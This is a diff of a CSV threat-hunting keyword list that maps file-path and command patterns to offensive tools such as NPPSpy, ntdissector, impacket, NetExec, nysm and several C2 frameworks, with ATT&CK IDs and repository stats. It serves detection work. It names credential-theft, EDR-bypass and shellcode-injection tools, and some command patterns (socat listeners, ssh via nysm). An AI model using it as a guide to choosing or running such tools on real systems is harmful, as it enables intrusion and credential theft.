Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/NPPSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/NPPSpy.exe*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" "*/nps_payload.git*","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","421","130","2017-08-08T14:12:48Z","2017-07-23T17:01:19Z" "*/nrpe-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/ntapphelpcachecontrol*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/ntdissector.git*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" -"*/ntdissector/*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*/ntapphelpcachecontrol*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/ntdissector.git*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*/ntdissector/*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" "*/ntdlll-unhooking-collection*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*/NTDLLReflection.git*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*/NtdllUnpatcher.git*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" -"*/ntds_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/ntlm.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/ntds_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/ntdsutil.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/ntlm.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*/ntlmquic*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*/NTLMRecon*","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","419","67","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" "*/NTLMRecon.git*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" @@ -4541,45 +4579,50 @@ "*/ntlmrelayx/*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" "*/ntlmscan.git*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" "*/ntlmscan/*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" -"*/ntlmtransport.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*/ntlmtransport.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" "*/ntlmutil.py*","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","419","67","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" "*/ntlmutil.py*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" "*/ntlmv1.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/ntlmv1.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/ntp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ntp-monlist.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/NtQuerySystemInformation.md*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1572","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" -"*/NtRemoteLoad.exe*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","173","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" -"*/NtRemoteLoad.git*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","173","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" -"*/NtRights/*","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*/NtSetSystemInformation.md*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1572","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" +"*/NtQuerySystemInformation.md*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1573","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" +"*/NtRemoteLoad.exe*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*/NtRemoteLoad.git*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*/NtRights/*","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/NtSetSystemInformation.md*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1573","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" "*/Nuages_Cli*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*/nuagesAPI.js*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" -"*/nxc --help*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*/nysm bash*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","30","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" -"*/nysm -dr socat TCP4-LISTEN*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","30","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" -"*/nysm -r ssh *@*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","30","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" -"*/nysm.bpf.c*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","30","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" -"*/nysm.git*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","1","30","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/nxc --help*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/nxc.exe*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/nxc/parsers/ip.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/nxc/parsers/nmap.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/nxc-ubuntu-latest*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/nysm bash*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/nysm -dr socat TCP4-LISTEN*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/nysm -r ssh *@*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/nysm.bpf.c*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/nysm.git*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" "*/o365recon*","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","7","617","94","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*/oab-parse/mspack.*.dll*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" -"*/obfs3/obfs3.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/obfuscated_scripts/*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/Obfuscator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*/Obfuscator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/obfs3/obfs3.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/obfuscated_scripts/*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/Obfuscator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/Obfuscator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*/obfuscator/obfuscator.*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*/octopus.asm*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*/Octopus.git*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*/octopusx64.asm*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" 